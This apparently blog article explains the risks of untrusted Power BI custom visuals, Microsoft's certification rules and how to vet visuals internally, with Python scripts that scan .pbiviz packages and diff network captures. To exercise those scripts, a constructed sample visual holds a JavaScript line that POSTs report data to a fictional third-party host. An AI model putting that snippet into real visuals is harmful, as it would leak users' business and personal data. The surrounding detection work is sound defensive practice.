In the second article of the series Governing Custom Visuals for Power BI, we focus on Microsoft's certification process for custom visuals, and deduce from that process the steps you would need to take to certify custom visuals internally in your organization.
But first, let’s answer some common questions:
- What are the risks of using Power BI Custom Visuals?
- Is it safe to allow report producers to use Custom Visuals from the marketplace?
- Can you trust the certified custom visuals?
(Read the first article here).
Custom Visual – The Risks
The Custom Visuals’ API framework in Power BI allows any developer to create Custom Visuals, and publish them to AppSource (aka the marketplace). The framework is built using technologies such as D3, HTML5, and CSS3, and allows the developer to create rich user experiences inside your Power BI report, and extend the current visualization and analytic capabilities of Power BI.
Before your report consumers can enjoy the awesomeness of custom visuals, you should be aware of the security, privacy and legal risks you take when you publish a Power BI report that includes an untrusted custom visual. Let's explain these risks using a real-life yet simple example. Imagine you love 3D pie charts (they are a bad idea, but I shouldn't be judgmental). One day you find an unknown company, PieBI Fake Insights LLC, which offers you the 3D Pie Chart custom visual of your dreams. You decide to use it in the mission-critical reports that are presented to your CEO on a daily basis.
Custom visuals have access to the data they need to render, and can send that data to external services. There are legitimate cases for sending data to an external web service, for example to enrich the user experience with added-value insights, but can you trust the visual's provider to handle the data with care and not exploit it?
Imagine the 3D Pie Chart sending your company's most protected financial results to PieBI Fake Insights LLC. Can you trust this provider? And even if you do, can you trust the provider's ability to apply the security controls needed to protect your data on its servers?
Four letters – GDPR – say it all. Imagine that your 3D Pie Chart shows personal information, including the names of your top clients, and perhaps even their email addresses in the tooltip. To adhere to GDPR, are you sure you are allowed to send this information to PieBI Fake Insights? What happens when one of your clients later asks you to remove their personal data? Can you ensure that their email address is also removed from PieBI's databases, or has PieBI already sold the data to third parties?
Does your company follow other regulations such as PCI, HIPAA or SOX? What happens if consumer or patient data is sent away via the Pie Chart visual? Does the visual transmit this information securely? Do the people at PieBI protect their data, and are they compliant with the same regulations your company follows?
Open source is great. The 3D Pie Chart visual uses the best open source technology to render your data, but are you sure that the developers at PieBI Fake Insights LLC have the legal rights to use the relevant open source libraries? Are you sure their licenses don't require you to credit the original open source developers in your own reports?
Given the security, privacy and legal risks, you can now understand why it is important to apply some measures before custom visuals reach mass adoption in your organization.
By default, if you use the Power BI service and your administrators are not familiar with this topic, there are no controls that restrict you from using custom visuals. When you add a custom visual through the Import from file option, you will get the following warning:
So, it is up to you to decide if the custom visual is safe, and can be trusted.
To make the decision easier for you, or for your IT, Microsoft has certified about 50% of the custom visuals in the marketplace, and offers a certification program for developers. Having certified visuals allows you to handpick the ones you need and ignore the untrusted ones. As a report author, you can identify a certified visual by one of these methods:
- Check whether the custom visual is listed here.
- When you import a custom visual from the marketplace, ensure that it has the blue checkmark (as highlighted in the screenshot below).
- In the marketplace dialog box, you can filter the visuals by Power BI Certified, as shown in the screenshot below:
- In DataChant Power BI Custom Visuals report, select the no-entry sign in the Certified Visuals slicer to find the certified visuals, and download them using the link icon in the main table:
Let’s learn more about Microsoft’s certification process.
Microsoft Certification Process
According to Microsoft, a “certified custom visual is one that has met a set of code requirements and has passed strict security tests.” In addition to the security, privacy and legal requirements, Microsoft also wants to ensure that certified visuals work well on the Power BI service, desktop, mobile and embedded versions of Power BI, and are also successfully exported to PowerPoint and displayed in emails for subscribed users.
To certify a custom visual, the developer will need to:
- Have the visual approved for publishing in the marketplace (AppSource)
- Implement the visual using API version 1.2 or higher
- Share the source code with Microsoft
- Use only public reviewable OSS (open source software) components
- Avoid accessing external services or resources from the visual (once Microsoft has confirmed this requirement, the main security and privacy concern, data leaving your tenant, is addressed)
As part of the certification process, Microsoft recommends that developers use ESLint with the default security ruleset to pre-validate the code before submission. ESLint scans the custom visual's source for errors and security violations without running the visual in Power BI. Learn more here.
To learn more about the certification process go here.
Internal Certification of Custom Visuals
So, now that you can trust certified visuals, the remaining question is this: how can you convince your organization to deploy an uncertified custom visual, and build the trust that your organization's policies require?
Follow Microsoft Certification Process
Ensure that the custom visual you plan to certify meets Microsoft's requirements above: check out the source code; read the user agreements and licenses; ensure that the visual makes no external network requests; and finally scan the visual for security violations.
Check out the Source Code
To find out whether the custom visual has its source code on GitHub, check the developer's website, or follow these steps:
- Download the .pbiviz file from AppSource, or from DataChant Power BI Custom Visuals report above.
- Save the .pbiviz file to a local folder and rename its extension to .zip (a .pbiviz package is a plain zip archive)
- Extract the zip file
- Open the package.json file (Step 1 in the next screenshot)
- Locate the visual nested object (Step 2 in the screenshot), and scroll right till you find the record field gitHubUrl (Step 3 in screenshot)
- In gitHubUrl you will find the hyperlink to the GitHub project with the relevant source code, if such a project exists.
Note that some developers don't include a link to a GitHub repository, and that the link is declared by the developer rather than verified, so the packaged code is the authoritative artifact. You can inspect the custom visual's code directly by reviewing the content of the resources folder in the unzipped .pbiviz; this is the bundled (often minified) JavaScript and CSS that actually runs in your reports.
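The steps above can be automated, which helps when you have dozens of .pbiviz files to review. The following script is an added example, not DataChant's or Microsoft's tooling: it opens the package as a zip, reads package.json, reports visual.gitHubUrl, and does a static pass over everything under resources/ looking for browser network APIs (fetch, XMLHttpRequest, WebSocket, sendBeacon, injected script/img tags) and absolute http(s) URLs. The sample package it builds in memory, including the visual name, GUID, repository link and telemetry URL, is constructed for the example; the assumption that a bundled visual keeps its JS and CSS as strings under content.js and content.css in the resource JSON is noted in the code.

```python
"""Static triage of a .pbiviz package: manifest, source repo link and network indicators.
Added example; the sample package below is constructed, not a real marketplace visual."""
import io
import json
import re
import zipfile

# Indicators of code that can reach the network from inside the visual.
NETWORK_APIS = {
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bXMLHttpRequest\b"),
    "WebSocket": re.compile(r"\bWebSocket\s*\("),
    "sendBeacon": re.compile(r"\bsendBeacon\s*\("),
    "injected script/iframe/img": re.compile(
        r"createElement\s*\(\s*['\"](?:script|iframe|img)['\"]"),
}
# Absolute http(s) URLs; quotes and parentheses are excluded so a match ends at the URL.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[A-Za-z0-9._~/%?=&-]*")


def read_manifest(pbiviz: bytes) -> dict:
    """A .pbiviz is a zip archive; package.json at its root is the manifest."""
    with zipfile.ZipFile(io.BytesIO(pbiviz)) as zf:
        return json.loads(zf.read("package.json"))


def github_url(manifest: dict):
    """visual.gitHubUrl is optional; None means the developer gave no repo link."""
    return manifest.get("visual", {}).get("gitHubUrl") or None


def _resource_text(raw: bytes) -> str:
    """Return the text worth scanning in one resource file.
    Assumption: a packaged visual stores its bundled JS/CSS as strings under
    content.js / content.css of a JSON resource; anything else is scanned raw."""
    text = raw.decode("utf-8", errors="replace")
    try:
        doc = json.loads(text)
    except ValueError:
        return text
    content = doc.get("content") if isinstance(doc, dict) else None
    if isinstance(content, dict):
        return "\n".join(v for v in content.values() if isinstance(v, str))
    return text


def scan_resources(pbiviz: bytes) -> dict:
    """Map each file under resources/ to the network APIs and URLs it references."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(pbiviz)) as zf:
        for name in zf.namelist():
            if not name.startswith("resources/") or name.endswith("/"):
                continue
            text = _resource_text(zf.read(name))
            apis = sorted(k for k, rx in NETWORK_APIS.items() if rx.search(text))
            urls = sorted(set(URL_RE.findall(text)))
            if apis or urls:
                findings[name] = {"apis": apis, "urls": urls}
    return findings


def build_sample_pbiviz() -> bytes:
    """Constructed stand-in for a downloaded .pbiviz; names, GUID and URLs are fictional."""
    manifest = {
        "visual": {
            "name": "PieBI3D",
            "displayName": "3D Pie Chart",
            "guid": "PieBI3D0000000000000000000000000",
            "version": "1.0.0",
            "gitHubUrl": "https://github.com/example-org/3d-pie-chart",
        },
        "apiVersion": "1.13.0",
        "resources": [{"resourceId": "rId0", "sourceType": 5,
                       "file": "resources/PieBI3D0000000000000000000000000.pbiviz.json"}],
    }
    # The visual posts the rows it was given to render to a third-party endpoint.
    js = ("var vis=function(o){var rows=o.dataViews[0].table.rows;"
          "fetch('https://telemetry.piebi.example/collect',"
          "{method:'POST',body:JSON.stringify(rows)});}")
    resource = {"visual": manifest["visual"], "content": {"js": js, "css": ".pie{fill:red}"}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("package.json", json.dumps(manifest))
        zf.writestr(manifest["resources"][0]["file"], json.dumps(resource))
    return buf.getvalue()


if __name__ == "__main__":
    pkg = build_sample_pbiviz()          # replace with open("visual.pbiviz", "rb").read()
    m = read_manifest(pkg)
    print("visual:", m["visual"]["displayName"], m["visual"]["version"])
    print("source repo:", github_url(m) or "(none declared: review resources/ directly)")
    for path, hit in scan_resources(pkg).items():
        print(path, "->", hit)
```

A hit is a reason to read the surrounding code, not a verdict: a URL may be a harmless link in a tooltip, and a minified bundle can obscure a call behind an alias. Treat an empty result as "nothing obvious" and still run the dynamic check in the Analyze Network Traffic section.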
Scan the Custom Visual
Follow Microsoft's recommendation and run ESLint on the code. The previous section showed how to obtain the source code, so this step should be straightforward.
I also recommend scanning the .pbiviz file with your organization's anti-virus software. In the past, some custom visuals were falsely detected as malware by certain anti-virus products (including Microsoft's own Windows Defender; see an example here). While these detections are usually false positives, you don't want your IT to be reluctant to deploy your favorite custom visual because the file is flagged as malware.
You can also use the free VirusTotal service here: upload the relevant .pbiviz file and scan it with dozens of known anti-virus engines (keep in mind that uploaded files are shared with VirusTotal's community, which is fine for a public marketplace visual but not for an internally developed one). For example, on September 2nd, when I ran one of the custom visuals through it to prepare this article, VirusTotal reported the file as safe by 57 AV engines, but one engine detected it as a virus (this alert is no longer reported, so it was most likely a false alarm).
Analyze Network Traffic
You can run the custom visual in Power BI Desktop and use a network capturing tool such as Fiddler to identify traffic between the custom visual and external web services (enable HTTPS decryption in Fiddler, otherwise you will only see CONNECT tunnels to hostnames, not the requests inside them). Make sure that your computer is not running other products that access the Internet, or take a baseline capture of the same report without the visual first, so that anything new can be attributed to the visual. If you identify suspicious network traffic, check the server names. Are they legitimate? This is a good time to contact the developer to understand the rationale behind the communication with the external service, whether it can be turned off, and which security and privacy measures the developer takes.
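Fiddler and browser developer tools can export a capture as a HAR (HTTP Archive) file, which makes the comparison between the baseline capture and the capture with the visual mechanical. The script below is an added example, not part of the article or of Fiddler: it lists every host contacted in a HAR export that is neither in the baseline nor under a suffix you consider expected, and for each one totals the number of requests and the bytes sent in request bodies, since a POST body is how rendered data would leave your machine. The expected-suffix list is an assumption for illustration and the HAR content is constructed; build the real baseline from your own capture.

```python
"""Diff a HAR capture against a baseline and report unexpected hosts.
Added example; the HAR below is constructed, and EXPECTED_SUFFIXES is an assumption."""
import json
from urllib.parse import urlsplit

# Domains a Power BI Desktop session is expected to talk to (assumed; tune for your tenant).
EXPECTED_SUFFIXES = ("powerbi.com", "analysis.windows.net", "microsoftonline.com",
                     "microsoft.com", "office.com")


def har_requests(har: dict):
    """Yield (host, method, url, bytes_sent_in_body) for each HAR entry."""
    for entry in har["log"]["entries"]:
        req = entry["request"]
        host = urlsplit(req["url"]).hostname or ""
        body = (req.get("postData") or {}).get("text") or ""
        yield host, req["method"], req["url"], len(body.encode("utf-8"))


def is_expected(host: str, baseline: set, suffixes=EXPECTED_SUFFIXES) -> bool:
    """A host is expected if the baseline capture saw it or it sits under a trusted suffix."""
    if host in baseline:
        return True
    return any(host == s or host.endswith("." + s) for s in suffixes)


def unexpected_hosts(har: dict, baseline: set, suffixes=EXPECTED_SUFFIXES) -> dict:
    """Return {host: {"requests": n, "bytes_sent": n, "urls": [...]}} for hosts to investigate."""
    report = {}
    for host, method, url, sent in har_requests(har):
        if is_expected(host, baseline, suffixes):
            continue
        rec = report.setdefault(host, {"requests": 0, "bytes_sent": 0, "urls": set()})
        rec["requests"] += 1
        rec["bytes_sent"] += sent
        rec["urls"].add(url)
    for rec in report.values():
        rec["urls"] = sorted(rec["urls"])
    return report


def load_har(path: str) -> dict:
    """Read a HAR export from disk (Fiddler: export sessions as HTTPArchive)."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


# Constructed capture: two normal Power BI requests plus two from the fictional visual.
SAMPLE_HAR = {"log": {"version": "1.2", "entries": [
    {"request": {"method": "GET", "url": "https://app.powerbi.com/home"}},
    {"request": {"method": "POST", "url": "https://login.microsoftonline.com/common/oauth2/token",
                 "postData": {"mimeType": "application/x-www-form-urlencoded",
                              "text": "grant_type=refresh_token"}}},
    {"request": {"method": "POST", "url": "https://telemetry.piebi.example/collect",
                 "postData": {"mimeType": "application/json",
                              "text": json.dumps([{"client": "Contoso",
                                                   "email": "ceo@contoso.example"}])}}},
    {"request": {"method": "GET", "url": "https://cdn.piebi.example/fonts/roboto.woff2"}},
]}}

# Constructed baseline: hosts seen when the same report ran without the visual.
BASELINE_HOSTS = {"app.powerbi.com"}


if __name__ == "__main__":
    for host, rec in unexpected_hosts(SAMPLE_HAR, BASELINE_HOSTS).items():
        flag = "DATA SENT" if rec["bytes_sent"] else "fetch only"
        print(f"{host}: {rec['requests']} request(s), {rec['bytes_sent']} bytes sent [{flag}]")
        for url in rec["urls"]:
            print("   ", url)
```

In the constructed capture the login host is filtered by suffix and app.powerbi.com by the baseline, leaving the two piebi.example hosts. The one receiving a 55-byte JSON body that contains a client name and email address is exactly the case the GDPR discussion above warns about; the font download is probably benign but still worth asking the developer about, since it reveals report usage to a third party.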
In the next article in this series, we will focus on organizational visuals, share their current limitations, and explain how you can deploy them. I hope you find this article useful. Share it with your IT to help them certify your uncertified custom visuals.